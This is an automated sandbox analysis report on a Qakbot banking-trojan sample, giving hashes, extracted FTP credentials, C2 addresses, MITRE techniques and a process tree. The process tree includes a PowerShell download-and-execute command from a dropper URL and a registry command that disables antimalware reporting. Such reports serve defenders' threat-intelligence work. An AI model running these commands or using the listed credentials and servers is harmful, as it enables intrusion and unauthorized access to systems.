qakbot | 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608

General

Target

058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
Size

400KB
MD5

30f804952e82a4bf30c776402967850f
SHA1

6db90c30220e594b31366a24a53fdb55308a4357
SHA256

058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608
SHA512

987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92

Score

10^/10

qakbot 1518695014 banker persistence stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.allens-treasure-house.com/books_files/001.ps1

Extracted

Family

qakbot

Version

322.148

Campaign

1518695014

Credentials

Protocol: ftp
Host:
66.96.133.9
Port:
21
Username:
help
Password:
eT5TerAcnFe6~

Protocol: ftp
Host:
174.123.38.58
Port:
21
Username:
[email protected]
Password:
4BQ1MeeRAwNZEVu

Protocol: ftp
Host:
61.221.12.26
Port:
21
Username:
[email protected]
Password:
346HZGCMlwecz9S

Protocol: ftp
Host:
67.222.137.18
Port:
21
Username:
[email protected]
Password:
p4a8k6fE1FtA3pR

Protocol: ftp
Host:
107.6.152.61
Port:
21
Username:
[email protected]
Password:
RoP4Af0RKAAQ74V

C2

179.62.153.88:443

50.198.141.161:2222

69.129.91.38:443

66.189.228.49:995

96.253.104.73:443

71.183.129.113:443

125.25.130.203:995

173.175.174.154:443

162.104.186.175:995

75.109.222.140:995

68.173.55.51:443

78.175.254.43:443

106.159.251.143:995

47.143.83.172:443

71.190.202.120:443

73.136.232.174:995

96.253.104.73:995

192.158.217.32:22

65.153.16.250:993

70.95.129.59:443

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

25 2992 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

wivbvi.exewivbvi.exe

pid process

2928 wivbvi.exe
3772 wivbvi.exe

flow	pid	process
25	2992	powershell.exe

pid	process
2928	wivbvi.exe
3772	wivbvi.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hwzjp = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Wivbvii\\wivbvi.exe\""	explorer.exe

Drops file in Windows directory 6 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exewivbvi.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	wivbvi.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wivbvi.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service	wivbvi.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	wivbvi.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	wivbvi.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	wivbvi.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4724 PING.EXE

pid	process
4724	PING.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exewivbvi.exepowershell.exewivbvi.exeexplorer.exesihost.exesvchost.exetaskhostw.exeExplorer.EXEsvchost.exe

pid	process
2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
3904	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
3904	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
3904	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
3904	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
2928	wivbvi.exe
2928	wivbvi.exe
2992	powershell.exe
2992	powershell.exe
3772	wivbvi.exe
3772	wivbvi.exe
3772	wivbvi.exe
3772	wivbvi.exe
824	explorer.exe
824	explorer.exe
2340	sihost.exe
2340	sihost.exe
824	explorer.exe
824	explorer.exe
2380	svchost.exe
2380	svchost.exe
2476	taskhostw.exe
2476	taskhostw.exe
2416	Explorer.EXE
2416	Explorer.EXE
2872	svchost.exe
2872	svchost.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

wivbvi.exe

pid process

2928 wivbvi.exe

pid	process
2928	wivbvi.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

svchost.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	2812	svchost.exe
Token: SeCreatePagefilePrivilege	2812	svchost.exe
Token: SeShutdownPrivilege	2812	svchost.exe
Token: SeCreatePagefilePrivilege	2812	svchost.exe
Token: SeShutdownPrivilege	2812	svchost.exe
Token: SeCreatePagefilePrivilege	2812	svchost.exe
Token: SeDebugPrivilege	2992	powershell.exe

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exewivbvi.exeexplorer.execmd.exe

description	pid	process	target process
PID 2244 wrote to memory of 3904	2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
PID 2244 wrote to memory of 3904	2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
PID 2244 wrote to memory of 3904	2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
PID 2244 wrote to memory of 2928	2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	wivbvi.exe
PID 2244 wrote to memory of 2928	2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	wivbvi.exe
PID 2244 wrote to memory of 2928	2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	wivbvi.exe
PID 2244 wrote to memory of 1568	2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	reg.exe
PID 2244 wrote to memory of 1568	2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	reg.exe
PID 2244 wrote to memory of 2992	2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	powershell.exe
PID 2244 wrote to memory of 2992	2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	powershell.exe
PID 2928 wrote to memory of 3772	2928	wivbvi.exe	wivbvi.exe
PID 2928 wrote to memory of 3772	2928	wivbvi.exe	wivbvi.exe
PID 2928 wrote to memory of 3772	2928	wivbvi.exe	wivbvi.exe
PID 2928 wrote to memory of 824	2928	wivbvi.exe	explorer.exe
PID 2928 wrote to memory of 824	2928	wivbvi.exe	explorer.exe
PID 2928 wrote to memory of 824	2928	wivbvi.exe	explorer.exe
PID 2928 wrote to memory of 824	2928	wivbvi.exe	explorer.exe
PID 824 wrote to memory of 2340	824	explorer.exe	sihost.exe
PID 824 wrote to memory of 2340	824	explorer.exe	sihost.exe
PID 824 wrote to memory of 2340	824	explorer.exe	sihost.exe
PID 2244 wrote to memory of 828	2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	cmd.exe
PID 2244 wrote to memory of 828	2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	cmd.exe
PID 2244 wrote to memory of 828	2244	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	cmd.exe
PID 828 wrote to memory of 4724	828	cmd.exe	PING.EXE
PID 828 wrote to memory of 4724	828	cmd.exe	PING.EXE
PID 828 wrote to memory of 4724	828	cmd.exe	PING.EXE
PID 824 wrote to memory of 2380	824	explorer.exe	svchost.exe
PID 824 wrote to memory of 2380	824	explorer.exe	svchost.exe
PID 824 wrote to memory of 2380	824	explorer.exe	svchost.exe
PID 824 wrote to memory of 2476	824	explorer.exe	taskhostw.exe
PID 824 wrote to memory of 2476	824	explorer.exe	taskhostw.exe
PID 824 wrote to memory of 2476	824	explorer.exe	taskhostw.exe
PID 824 wrote to memory of 2416	824	explorer.exe	Explorer.EXE
PID 824 wrote to memory of 2416	824	explorer.exe	Explorer.EXE
PID 824 wrote to memory of 2416	824	explorer.exe	Explorer.EXE
PID 824 wrote to memory of 2872	824	explorer.exe	svchost.exe
PID 824 wrote to memory of 2872	824	explorer.exe	svchost.exe
PID 824 wrote to memory of 2872	824	explorer.exe	svchost.exe
PID 824 wrote to memory of 3268	824	explorer.exe	DllHost.exe
PID 824 wrote to memory of 3268	824	explorer.exe	DllHost.exe
PID 824 wrote to memory of 3268	824	explorer.exe	DllHost.exe

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2872

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2416

C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
"C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe"
2⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2244

C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
"C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe" /C
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:3904

C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbvi.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbvi.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2928

C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbvi.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbvi.exe" /C
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:3772

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:824

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
3⤵
PID:1568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\jyxynixbqdlzigozpybqeaxqoow.txt'"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:828

C:\Windows\SysWOW64\PING.EXE
ping.exe -n 6 127.0.0.1
4⤵
- Runs ping.exe
PID:4724

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2380

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2812

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Peripheral Device Discovery

1

T1120

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbv.dat
MD5
56e49376af78bd72413e65733e7dc965

SHA1
a14b8bc92f924ee21212b494265edccb998e0c59

SHA256
11c93ce74a900510ec6cf481f2f4713b310b5c4baa2a7b85c18df68f28729abb

SHA512
cf0f3ec557e446964ef099e9d051297c673ea9a0f3528cd7084ec84aef56d276a6892a9efa2af4dc97a503fec2dc5e17ae2c7c5b75309024f8ddc33f55cb765b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbvi.exe
MD5
30f804952e82a4bf30c776402967850f

SHA1
6db90c30220e594b31366a24a53fdb55308a4357

SHA256
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608

SHA512
987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbvi.exe
MD5
30f804952e82a4bf30c776402967850f

SHA1
6db90c30220e594b31366a24a53fdb55308a4357

SHA256
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608

SHA512
987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbvi.exe
MD5
30f804952e82a4bf30c776402967850f

SHA1
6db90c30220e594b31366a24a53fdb55308a4357

SHA256
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608

SHA512
987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92

Download Submit
memory/824-142-0x0000000000830000-0x0000000000898000-memory.dmp

Filesize
416KB

Download
memory/824-153-0x0000000002B30000-0x0000000002B31000-memory.dmp

Filesize
4KB

Download
memory/824-150-0x0000000002B90000-0x0000000002B91000-memory.dmp

Filesize
4KB

Download
memory/824-156-0x0000000002B60000-0x0000000002B61000-memory.dmp

Filesize
4KB

Download
memory/824-147-0x0000000002AD0000-0x0000000002AFF000-memory.dmp

Filesize
188KB

Download
memory/824-143-0x00000000024B0000-0x00000000024B1000-memory.dmp

Filesize
4KB

Download
memory/824-144-0x0000000002B00000-0x0000000002B01000-memory.dmp

Filesize
4KB

Download
memory/2340-148-0x00007FFD1F90D000-0x00007FFD1F90E000-memory.dmp

Filesize
4KB

Download
memory/2340-149-0x00007FFD1F860000-0x00007FFD1F861000-memory.dmp

Filesize
4KB

Download
memory/2340-145-0x0000000000DF0000-0x0000000000DF1000-memory.dmp

Filesize
4KB

Download
memory/2340-146-0x0000000000D90000-0x0000000000DBC000-memory.dmp

Filesize
176KB

Download
memory/2380-155-0x00007FFD1F860000-0x00007FFD1F861000-memory.dmp

Filesize
4KB

Download
memory/2380-154-0x0000000000990000-0x00000000009BC000-memory.dmp

Filesize
176KB

Download
memory/2416-151-0x0000000002860000-0x000000000288C000-memory.dmp

Filesize
176KB

Download
memory/2416-152-0x00007FFD1F860000-0x00007FFD1F861000-memory.dmp

Filesize
4KB

Download
memory/2476-157-0x0000000000DE0000-0x0000000000E0C000-memory.dmp

Filesize
176KB

Download
memory/2476-158-0x00007FFD1F860000-0x00007FFD1F861000-memory.dmp

Filesize
4KB

Download
memory/2812-130-0x000001C2F2730000-0x000001C2F2740000-memory.dmp

Filesize
64KB

Download
memory/2812-132-0x000001C2F5480000-0x000001C2F5484000-memory.dmp

Filesize
16KB

Download
memory/2812-131-0x000001C2F2790000-0x000001C2F27A0000-memory.dmp

Filesize
64KB

Download
memory/2992-139-0x000001F879436000-0x000001F879438000-memory.dmp

Filesize
8KB

Download
memory/2992-137-0x000001F879433000-0x000001F879435000-memory.dmp

Filesize
8KB

Download
memory/2992-138-0x000001F879570000-0x000001F879592000-memory.dmp

Filesize
136KB

Download
memory/2992-135-0x000001F878483000-0x000001F878485000-memory.dmp

Filesize
8KB

Download
memory/2992-136-0x000001F879430000-0x000001F879432000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads